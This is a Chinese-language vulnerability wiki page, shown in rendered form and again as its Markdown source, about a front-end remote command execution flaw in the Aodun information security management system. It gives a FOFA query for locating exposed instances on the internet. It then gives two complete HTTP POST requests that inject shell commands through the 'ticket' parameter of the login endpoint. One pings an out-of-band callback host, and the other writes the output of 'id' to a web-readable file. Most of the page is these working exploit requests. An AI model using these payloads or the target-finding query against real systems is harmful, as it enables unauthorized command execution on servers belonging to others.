fofamini-wiki

登录白背景

源码

傲盾信息安全管理系统前台远程命令执行漏洞

一、漏洞简介

傲盾信息安全管理系统是傲盾网络科技股份有限公司的一个信息安全管理产品。该系统的前台存在远程命令执行漏洞,远程攻击者可以构造特殊的请求,注入系统命令,由于过滤不足,导致成功在目标服务器执行任意系统命令。 ,该远程命令执行漏洞的利用难度低，可导致远程命令执行。

二、影响版本

傲盾信息安全管理系统

三、资产测绘

fofabody="傲盾软件" && body="aodun/aodun.js"
特征

四、漏洞复现

POST /user_management/sichuan_login HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

loginname=sysadmin&ticket=|ping tiqqklzooy.iyhc.eu.org

POST /user_management/sichuan_login HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

loginname=sysadmin&ticket=|echo `id` > /adm/isms_web/static/base_static/js/aodun/1.txt

/static/base_static/js/aodun/1.txt

原文: https://www.yuque.com/xiaokp7/ocvun2/sdu622si610nmpvy

# 傲盾信息安全管理系统前台远程命令执行漏洞

# 一、漏洞简介
傲盾信息安全管理系统是傲盾网络科技股份有限公司的一个信息安全管理产品。该系统的前台存在远程命令执行漏洞,远程攻击者可以构造特殊的请求,注入系统命令,由于过滤不足,导致成功在目标服务器执行任意系统命令。 ,该远程命令执行漏洞的利用难度低，可导致远程命令执行。

# 二、影响版本
+ 傲盾信息安全管理系统

# 三、资产测绘
+ fofa`body="傲盾软件" && body="aodun/aodun.js"`
+ 特征

![1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842.png](./img/iKy_I61sKHi42MYu/1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842-056717.png)

# 四、漏洞复现
```java
POST /user_management/sichuan_login HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

loginname=sysadmin&ticket=|ping tiqqklzooy.iyhc.eu.org
```

![1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9.png](./img/iKy_I61sKHi42MYu/1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9-172980.png)

```java
POST /user_management/sichuan_login HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

loginname=sysadmin&ticket=|echo `id` > /adm/isms_web/static/base_static/js/aodun/1.txt
```

![1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578.png](./img/iKy_I61sKHi42MYu/1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578-119515.png)

```java
/static/base_static/js/aodun/1.txt
```

![1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4.png](./img/iKy_I61sKHi42MYu/1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4-205174.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sdu622si610nmpvy>